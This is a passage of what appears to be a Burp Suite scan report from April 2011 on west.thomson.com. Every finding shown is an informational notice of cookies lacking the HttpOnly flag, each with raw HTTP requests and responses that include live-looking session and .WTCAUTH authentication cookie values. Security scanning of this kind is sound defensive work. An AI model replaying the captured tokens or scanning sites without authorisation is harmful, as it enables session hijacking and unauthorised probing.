<ReverseIPResult><CountryCode>US</CountryCode><StatusCode>Success</StatusCode><Zip>75207</Zip><IP>173.193.214.243</IP></ReverseIPResult>

14.132. http://west.thomson.com/Error/500Error.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /Error/500Error.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Error/500Error.aspx?aspxerrorpath=/store/productdetail.aspx HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA; UserSiteIdIdentifier=; .WTCAUTH=15EB1E2BD55FB642DEFDF69E45C933941D077548D9E77F5DFD86AFA9231864655A2D3B0A5DA53C12ECD77027BFA162DFE1C25838CD6ED0BA7EA11DF766E81FF9BE80932A802690C8D89CCD970BFE43D957372263E299FCB576D90CB191BE9C03BFA81FE18D6C1ABC185B6A95A9C3FE7C6D15760BFC5FE4F3A675D865307B7D2C00D2ADADD2A8C8C503C9A225B6F3DB06817479DC6714AA5F037A2AE2E40D4090AC151A6DF079A011C7D783412F0443C1E4CC8EA514A71C6F69B68B045D51D4F25992FD629E534853F1810AB486114ECE9F7CA350D4192436BFB8E836202640C7A7A9CEA9

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:43:02 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=6C2776260A06E0DA7E316662F35CD801FB1884F55F2D184C53D0D2F4AA981F1850DC4F54B455CC740DE6A3A61A343349F17598FFF202335A75BD6FA9930A4102F07FA82899CA9DF3ECE6D45B7DFB1136EF60AAF3D1093EB92D363DEDF846159C5EEA4B2C6654B511316A827828B49D7A8F4BAA567EE0AC56D57D345784960460228A95779E1C4391520F348B9037D5ACF439811F80B15F5EFC008F6F0846F5E0EA79BF17D2624B6A8E054DB0507FE036C08288195B48FA84DF92A90D2ACAFF0CE9218C7C1D32DDD289B076CE7A75DDDCC337F829198E1CBF95448E9FD984AE5899980BD9; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 78059


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...

14.133. http://west.thomson.com/GlobalBackgroundStyles.5.1.421.22.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /GlobalBackgroundStyles.5.1.421.22.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GlobalBackgroundStyles.5.1.421.22.ashx HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/Error/500Error.aspx?aspxerrorpath=/store/productdetail.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
If-None-Match: ""
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; s_ppv=100; c_m2=1; c=undefined571419undefined; SC_LINKS=store%3Apromotions%3Aemailpreferences%3Alogin%5E%5EFree%20Ground%20Shipping%5E%5Estore%3Apromotions%3Aemailpreferences%3Alogin%20%7C%20Free%20Ground%20Shipping%5E%5E; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%5D; gpv_pn=store%3Apromotions%3Aemailpreferences%3Alogin; s_sq=thwest%3D%2526pid%253Dstore%25253Apromotions%25253Aemailpreferences%25253Alogin%2526pidt%253D1%2526oid%253Dhttps%25253A//west.thomson.com/support/customer-service/order-info.aspx%252523freeshipping%2526ot%253DA; UserSiteIdIdentifier=; .WTCAUTH=379C798BB6DB949F9D4A346BDE9CE9B5C67507F974B079B908D5CC4F50B716E23668FED21543CCD937ABCEC5BABC95E7A8A04A82B08CBA78B38904B0172EB264D0975D8951460E3F39E5A548BE29135C5EE63383975E7C1666D0F33D634C188771E5D34242D420AE62C4C52EE79EB8BC94605471249CA474DF3199E9B1A48D8F7BA7BA571F2FD7868EB807D530FDB93622631719B211AB540789E44C0D9D2D379F20E379EE936E20C5157A6C40EA14CACDA613FFC2F21CC1D45FFC4C22516F0B3428A615FBBD1CBE07EB1CF6D247061E809F200E183B04A593F90C71E2CEC27E92B94233

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:29:34 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=3667CA2CB117C94ADECD50E499D4EDE1366407401A3598A477013BCC111A6335E05A67E843D1F884F0C9398D85BF1686D0E9BCB5086219D99FCDCE2ADC2FB0A84E01F186A93B4957BE85B30D4496BFD0D48B8EF387C0ACBC4F73AD17BFEA9716AFDF2F1CC3A9B6A6BA789AC7850448A29F3AD380ABE8889A93C6A7D9211EDBC4A03E0158FA1FE7EA2FA10B7BC09EDEF28EEBF0AE10B4B02FF794D2174CB8357953BC7456E086AB13B74C0DB0B45285DB466E9BBEAA903532C4CA13AAA4F125BD1BF9FD8F66A02A3C5683A6EFFADC2BB7C5E22538F2EA0F311441895BE800281D8EFFEFFD; path=/
Cache-Control: private
Expires: Mon, 25 Jul 2011 03:49:34 GMT
Content-Type: text/css; charset=utf-8
Vary: Accept-Encoding, User-Agent
Connection: Keep-Alive
Content-Length: 4516

.Header_Org_SideBar1{background-image:url('http://images.west.thomson.com/organizations/headers/sidebar1.jpg');margin-top:2px;height:85px;width:241px}.Header_Org_SideBar2{background-image:url('http://
...[SNIP]...

14.134. http://west.thomson.com/Register/CreateTransferToken.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /Register/CreateTransferToken.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Register/CreateTransferToken.aspx?ReturnUrl=https%3a%2f%2fmyaccount.west.thomson.com%2fMyAccount%2fAccessControl%2fAccessControl%2fSignIn%3fReturnUrl%3dhttp%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; s_cc=true; c=undefined571422undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%5D; s_ppv=66; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shopping%20Cart; s_sq=thwest%3D%2526pid%253DShopping%252520Cart%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Btry%25257Bctl00%252524placeHolderTopNavigation%252524placeHolderContent%252524btnProceedBottomHideSub%2526oidt%253D2%2526ot%253DIMAGE; UserSiteIdIdentifier=; .WTCAUTH=FDCDD3CCDE1E864402B9FC99C17C5B887E4F142C7E539940508F9F7479A6A6F433A5B1298DA99CBBD01CC94400DE585D91C0BC2044A5DA3945B77A521C66DF4338A0F22A9AE831BC4D28B1B360FFA8BC5F7FEFCCCD8455667134A5A3C8102426B33E2E3C145412DD2FC7BAE2D1CF511058AF4AC6C8158E791D929260CFD17BFDF9A91806384EB9892622A5C4D4B2F99ACA7BB96849E4E1F35EDDBE997CF3F1A087FAD644670217520402D18C4C7DC1B3E409FCCFD1749D5356AF72C2DE92A54626B4737812FE5F26773127B302BF70BC002DA3B3EDC640107FA24DBEFD453411A2E9878D

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:04:32 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west.thomson.com%2fMYACCOUNT%2fdefault.aspx%3fReturnUrl%3d%2fMyAccount%2fCommon%2fLanding%2fMyAccountLanding%3fpromcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless%26promcode%3d571424%26sauth%3dwest_thomson_com%26xauth%3dseamless&transferToken=
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=211BC1381863CE08F4F9C87068B139B8251FAC76DD6AC90F063CF465F26E2A0FEC3FF72E81E4D9C28915DAE7F8F14D0EA41186F8C3B5D8D9C71C3343C241730B23A636EFAF5EFC7EE964C170EE05135E66C101E83D9807BC578D84ED9F70BE29502B19857E099BB2E8D5DAD87C6CA096BC7B5ED409879FE387757B45FD3340903123415BB6DD41707E367AEFD73B9DCCBC2C5321D7A8F9351501697CA7DC1E8AD9C1B38DEFF7109DB9B139772A698CC58464F7EAE38858C5533E3A03746B1FD144CC129C67CB72E4ADC7E548A90C432EC6B9FD9EB6A13628659D313B626A7BE2FF49DF98; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 489

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://myaccount.west.thomson.com/MyAccount/AccessControl/AccessControl/SignIn?ReturnUrl=http%3a%2f%2fmyaccount.west
...[SNIP]...

14.135. http://west.thomson.com/Signin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /Signin.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Signin.aspx?ReturnUrl=%2fstore%2fsecure%2fShoppingBasket.aspx%3fPromCode%3d571423&PromCode=571423 HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://burp/show/33
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; LastKnownSiteId=1; s_ev48=%5B%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849781175%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849784869%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303850887310%27%5D%5D; UserSiteIdIdentifier=

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 23:13:23 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: /store/secure/ShoppingBasket.aspx?PromCode=571423
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: ASP.NET_SessionId=wydb1rnw2uaex31bvixb1l4i; path=/; HttpOnly
Set-Cookie: s_id=wydb1rnw2uaex31bvixb1l4i; path=/
Set-Cookie: .WTCAUTH=D34744037A5E210E5573FB52B08FF4DF6D15A6FCDD7047FD81199D6CC7735FD23A87813BF0E52529314AEC364EEFC403B546734C0ACBD337302590201B656BE91E1B32A40806344D154B5AF7AD634FC87A3E44BFD6814C9E7F8DA6B0DB0232C64A1A56274DB4784494A69B41972A5688729D6FC4501FEB40030BC9C798A608B2304ACB358F2CE4BC014B6A66F9FE02CAFA27F6D3066933B5A1B18FD2DC4031E089DF429B9ADDC6B56FD89186C24CB5C101ED6F0CBCFB547C2678E55BC7FE6BEB3C7112BDC0781544B042995F08EF3A3F812698D4B1CE71434777FF68E8D149D477DD296A; path=/
Set-Cookie: Guest_Status=True; path=/
Set-Cookie: Guest_User=-1; path=/
Set-Cookie: LastKnownSiteId=1; domain=.west.thomson.com; expires=Mon, 26-Apr-2021 23:13:23 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 166

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/store/secure/ShoppingBasket.aspx?PromCode=571423">here</a>.</h2>
</body></html>

14.136. http://west.thomson.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:02:52 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: ASP.NET_SessionId=0xhchh4dyhomfi1jfdhr2vqt; path=/; HttpOnly
Set-Cookie: s_id=0xhchh4dyhomfi1jfdhr2vqt; path=/
Set-Cookie: anonymous_userid_1={6eed97b3-02ac-4505-898e-74b46a092d39}; expires=Fri, 29-Apr-2011 20:02:52 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 73372


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><m
...[SNIP]...

14.137. http://west.thomson.com/productdetail/160547/12484463/productdetail.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /productdetail/160547/12484463/productdetail.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /productdetail/160547/12484463/productdetail.aspx?PromCode=645229L86530&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c_m2=1; c=undefinedDirect%20LoadDirect%20Load; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; gpv_pn=default; s_sq=%5B%5BB%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:03:22 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=F31052139A373540424741E268099E6241C09AA45A626DE2A38C22E931FE39A836ECA06504AB5E11D899AB974340AC3CA22EFA3BB0676F1C0B8373726AAD802F355075EA717D1B28441FC4F53A7328B7FD809F21298A2BB310E7B3E4873D669AB0C1DC219FC364772434FECA03988543E0C149CD8DC2D028D16CDF8B7C86EE82F6122626596B9EC5B4BD031E6A0CB5A74116B5FFAE079B9DC014893820F0EF5A0D46558FF9B020B1DB315FE28D9157A01B864D7CF4B3A9F4F24F0CF57722CEACF6E4E538CFC9886E21DFACDFB09725777C42B39CBFDE80E488D41C726AC1CBF53B9A1753; path=/
Cache-Control: private, must-revalidate
Expires: Tue, 26 Apr 2011 20:03:22 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 133357


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><meta c
...[SNIP]...

14.138. http://west.thomson.com/store/AddItem.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/AddItem.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/AddItem.aspx?Product_id=162495&MaterialNumber=22061301&Product_type=1&promcode=600582C43552&promtype=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; s_cc=true; c=undefinedDirect%20LoadDirect%20Load; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%5D; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; s_ppv=75; .WTCAUTH=06CA2923AD720AED00911CF592288E796D54EF811208119980F8FB37CA43273D9DFEC8C40F3C0D72C7F3F5BB3FA9C8F3C5E74EE348ECCA6B35E4E107909B01AE597FE9603A89811073C77C2D1CEF0DFCF4C3954A224BA70CB09C1F7BB4132B10277D7057D02CD5A348E567450BC9313BF64CF52EE76F06E0A742647B41E23ED82ABCD1F3EF162F1597FC356A16F46C4C3ECC94AE454D8BD3AE08271BA0F4BF28ED7AAD920CC0D4EB5DA1F49BB1CE5F414460A82807C25F612865975ED0388641DF48A052AE97A698D5F7B6FCE96AA4A5F527AD930E272A65F131FEF9F615E6BC8D4D124F; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; UserSiteIdIdentifier=; c_m2=1; SC_LINKS=default%5E%5Ehttp%3A//images.west.thomson.com/buttons/AddToCartSmall.gif%5E%5Edefault%20%7C%20http%3A//images.west.thomson.com/buttons/AddToCartSmall.gif%5E%5E; gpv_pn=default; s_sq=thwest%3D%2526pid%253Ddefault%2526pidt%253D1%2526oid%253Dhttp%25253A//west.thomson.com/store/AddItem.aspx%25253FProduct_id%25253D162495%252526MaterialNumber%25253D22061301%252526Product_type%25253D1%252526%2526ot%253DA

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:03:29 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&CartContents=22061301%3b&PromCode=600582C43552&PromType=internal
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=2DCC7565792A93E4A3B59BB53EC980046A539A77646F3E66CEE29E96764D0E3D43BEABEC77DCD9D06A3B855725F304796FF8A93B7CB43D124601CB0B7784E132AD1318C4098179D9FF988AE1612D4821055B5299FC267D4A0ECC75BF5C374E33BB9BD6E99C4022323AEC0CC623BE2E0642475B1787F37713D3799E0D5F37923C3795B82BB20BE8541582F38EBC5EB9A0FB502FD588B06D4F113234D6C8CF4E575DD0C2720AABDA7085C8FFBA9E8AC7DFE1FBF721A679C0301D35FEF406BB79C026A4B5814EF29EDC9010AF0B98F42FC1B1DC9608476F9291428911E3CD22CC2A20B63708; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 291

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://west.thomson.com/store/secure/ShoppingBasket.aspx?CartEventsAndParams=scAdd%3a+22061301%3b&amp;CartContents=22
...[SNIP]...

14.139. http://west.thomson.com/store/DOTD.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://west.thomson.com
Path:   /store/DOTD.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /store/DOTD.aspx?Product_id=12484463&PromCode=645229L86530&PromType=internal HTTP/1.1
Host: west.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=bijb1vookoje2tnvwh5oouwn; s_id=bijb1vookoje2tnvwh5oouwn; anonymous_userid_1={71c28bcc-895f-4239-9850-58ed6aba178d}; _msuuid_787f8z6077=2F84C080-8A3F-4B04-9E5C-65EFFF4158D3; Guest_Status=True; Guest_User=-1; LastKnownSiteId=1; SbasketVw=T; UserSiteIdIdentifier=; .WTCAUTH=710246AFEFD5447ED38F5ED9B6DB451F14F8B26AA20C1EA5DBE638293D8F732E280E7A50B4AAE6E88B805F045E901AAE55797344A7CDC11779DA3EE861D7A9AD5F18C6EE9DC5A86388AFD49F24F39132A970F0F140A1303A8756B759B648B752B9AD9DB6F1FE4702ED9F5ACF5613EC562177DA4F97DE1DA22A4283C84BADC41E1128330CB0E44D705CA165EDCD9E00B2D35AF4320C8DB08AF03089A794B677809D398CA82BD8CDA7A39315C9FA6DAF7AFC08722902D59D6CD8FD7ED954955F4C2B760DC92E3F238BFDBA70C3652CB3EA3F1156D47F06F5B24627AC03070163105A0B0E93; s_cc=true; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%5D; s_ppv=45; c_m2=1; c=undefinedkbportal.thomson.comkbportal.thomson.com; SC_LINKS=support%3Acontact-us%3Adefault%5E%5EDeal%20Of%20The%20Day%5E%5Esupport%3Acontact-us%3Adefault%20%7C%20Deal%20Of%20The%20Day%5E%5E; gpv_pn=support%3Acontact-us%3Adefault; s_sq=thwest%3D%2526pid%253Dsupport%25253Acontact-us%25253Adefault%2526pidt%253D1%2526oid%253Dhttp%25253A//west.thomson.com/store/DOTD.aspx%25253FProduct_id%25253D12484463%252526PromCode%25253D645229L86530%252526PromType%25253Dinternal%2526ot%253DA

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:35:54 GMT
Server: Microsoft-IIS/6.0
Etag: ""
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Location: /Error/500Error.aspx?aspxerrorpath=/store/DOTD.aspx
Set-Cookie: UserSiteIdIdentifier=; path=/
Set-Cookie: .WTCAUTH=7084F0DB53EA84FCE39FA88CB58EB3E5BAA21F4EF0A8D74E802D354C8A86EB1283498887AD6D9A81749FC12498023FBB115363D33366D893085D3B9D8CA30A632885192F7B02829CB49F8540074CC75B43688EBF6E27857FBFE6BC70434A7A33315B77BFC224939D5A448883221E42D190032C6769F433D8BDB2667CA3D0A42DCEA57F2FB0C67C349B8DFC1D5CE43CDD611B73E9D22FC3953DF0F9D47930C2702DAD06D639C20AC8E5E8DBCA158D03B9351F297E798ED68A1BCAB64B5100436D8A1503A70469FE7353B444DE773A776F823EC7DD08144375EBE807B06789551B3C0F0BE6; path=/
Cache-Control: private
